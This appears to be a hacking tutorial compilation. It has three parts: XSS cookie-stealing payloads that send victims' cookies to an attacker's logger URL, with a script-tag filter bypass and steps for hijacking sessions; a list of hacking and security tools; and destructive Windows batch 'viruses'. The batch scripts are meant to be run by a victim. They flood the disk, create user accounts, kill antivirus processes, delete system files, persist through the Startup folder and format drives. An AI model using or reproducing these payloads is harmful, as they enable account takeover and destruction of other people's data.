<script>document.location='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie</script>

<script>window.open('http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie)</script>

<script>window.location='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie</script>



Once you have posted this to the blogging system, and it's echoed on the index.php, we just have to be patient and hope the administrator of the site visits it soon, so we can get their cookie.

Another method I want to go over is the <script src=> method. The only difference with this one is that the main script is kept off-site, and is fetched by the <script src> tag, and then executed on the page. This is advantageous in many ways. It can reduce the size of our script on the target site for one, and secondly it can be changed if we want to change the functionality of our XSS. This type of XSS is usually more practical for worms, and keyloggers, but is definitely worth knowing.



Example 2 :



Our cookie logger URL : http://mysite.com/logger.phpcookielogger.php

Our script URL : http://mysite.com/script.js

Vulnerable Page : http://someblog.com/index.php

Injection Point : http://someblog.com/post.php



Here is how we include or foreign script :



<script src='http://mysite.com/script.js%27></script>



Inside the script we just need the logger, use a function from Example 1. An example of our script would be :



location.href='http://mysite.com/logger.php?cookie=%27+cookiecookielogger.php?cookie='+cookie;



Again, like anything, patience is a virtue.

Here the site is your own hosting site to host the cookielogger srcipt.

Possible Limitations and Basic Filter Evasion Techniques :

The filter I will show you is a filter which removes the '<script>' and '</script>' tags. While a very basic and common method of filtering, it is ridiculously easy to bypass.

Example 1 ~ Tag Removal :

I insert the JavaScript : '<script>alert('XSS')</script>',

and it returns the string : alert('XSS').

Never fear, there is away around this. If I now insert this : '<scr<script>ipt>alert('XSS')</scr</script>ipt>'

Now the script will remove the tags, and echo what's left, which is : <script>alert('XSS')</script>.



There are other methods also. Use Google.





Well if your hosting site is too long then a smart tip is this that you use ip instead of URL.




What to do when you get cookies in txt. file in hosting :

These are the steps:

1. Open FireFox. 
2. Click on Tools in the menu bar. 
3. Click on Cookie Editor.
4. Click on Add.

Adding the cookie



     5.In name, add the name of that cookie, (the bit before the =)



     6.In content, add the value.



     7. In host, add .site.com, unless its a sub domain or otherwise stated, (the dot infront of the domain name  is important).



     8.In path, write /, unless you have the exact path where you want the cookie to be active.



Repeat this procedure until every cookie has been added. Once this is done, you can navigate to the website and check to see if you have logged in. So, Thats a short guide on XSS.

21 Hacking Tools

These are Top 20 Hacking Tools, which are used for various purposes.

Nessus



The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.



Ethereal

Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.



Snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.



Netcat

Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol



TCPdump

TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.



Hping

Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).



DNSiff

DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).



GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.



Ettercap

Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.



Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.



John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix.



OpenSSH

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.



TripWire

Tripwire is a tool that can be used for data and program integrity assurance.



Kismet

Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.



NetFilter

NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.



IP Filter

IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.



pf

OpenBSD Packet Filter



fport

fport identifys all open TCP/IP and UDP ports and maps them to the owning application.



SAINT

SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.



OpenPGP

OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.



Brutus



Brutus is a remote password cracker.With the help of it you can crack ftp etc.

Playing with Notepad (Learn to make simple Viruses)

Hello all! Today i am going to show you some of the harmless and harmfull noptepad viruses. Use the following scripts (Some might work in windows 7 or some in Xp) to annoy any friend. Just open notepad od windows and

save them as anything.bat and when the victim will run them action will be taken.



Open Unlimited Windows Until Restart :

Echo off

:loop1

start command

start command

start command

start command

start command

start command

start command

start command

start command

start command

goto loop2



:loop2

start command

start command

start command

start command

start command

start command

start command

start command

start command

start command

goto loop1



##########################################

Flood Hard Disk until all the space is taken :

@ECHO OFF

@ECHO A PHOENIX PRODUCTION

@ECHO MAIN BAT RUNNING

GOTO start



:start

@ECHO SET snowball2=1 >> bat6.bat

@ECHO GOTO flood5 >> bat6.bat

@ECHO :flood5 >> bat6.bat

@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat

@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat

@ECHO GOTO flood5 >> bat6.bat

START /MIN bat6.bat

GOTO bat5



:bat5

@ECHO CD %%ProgramFiles%%\ >> bat5.bat

@ECHO SET maggi=1 >> bat5.bat

@ECHO GOTO flood4 >> bat5.bat

@ECHO :flood4 >> bat5.bat

@ECHO MKDIR maggi%%maggi%% >> bat5.bat

@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat

@ECHO GOTO flood4 >> bat5.bat

START /MIN bat5.bat

GOTO bat4



:bat4

@ECHO CD %%SystemRoot%%\ >> bat4.bat

@ECHO SET marge=1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

@ECHO :flood3 >> bat4.bat

@ECHO MKDIR marge%%marge%% >> bat4.bat

@ECHO SET /a marge=%%marge%%+1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

START /MIN bat4.bat

GOTO bat3



:bat3

@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat

@ECHO SET bart=1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

@ECHO :flood2 >> bat3.bat

@ECHO MKDIR bart%%bart%% >> bat3.bat

@ECHO SET /a bart=%%bart%%+1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

START /MIN bat3.bat

GOTO bat2



:bat2

@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat

@ECHO SET homer=1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

@ECHO :flood >> bat2.bat

@ECHO MKDIR homer%%homer%% >> bat2.bat

@ECHO SET /a homer=%%homer%%+1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

START /MIN bat2.bat

GOTO original



:original

CD %HomeDrive%\

SET lisa=1

GOTO flood1

:flood1

MKDIR lisa%lisa%

SET /a lisa=%lisa%+1

GOTO flood1

Note : Save this as flood1.bat 

Erase Windows:

erase c:\windows

Shutdown Computer:

@echo off

shutdown -s -t 5 -c "Shutdown"

Multi Function Virus:

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Virus will:



1. End Process, NAVAPSVC.exe

2. End Process, Explorer.exe (taskbar and icons will dissapear)

3. End Process, zonelabs.exe

4. associate a exe file with txt (when opening exe files, it will go to notepad)

5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)

6. Deletes Login/Logoff Screens

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

How to add created viruses in StartUp:



1) For this u can use the simple code below .. (adcd is you bat file name)

@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

and then the rest of the code ..



2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

@echo off
shutdown -s -t 5 -c "Shutdown"

save it as abcd.bat when ever you will run it it will be saved in your start ups..



here time 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol



Format Hard Disk Partitions:



1) format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

2) format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000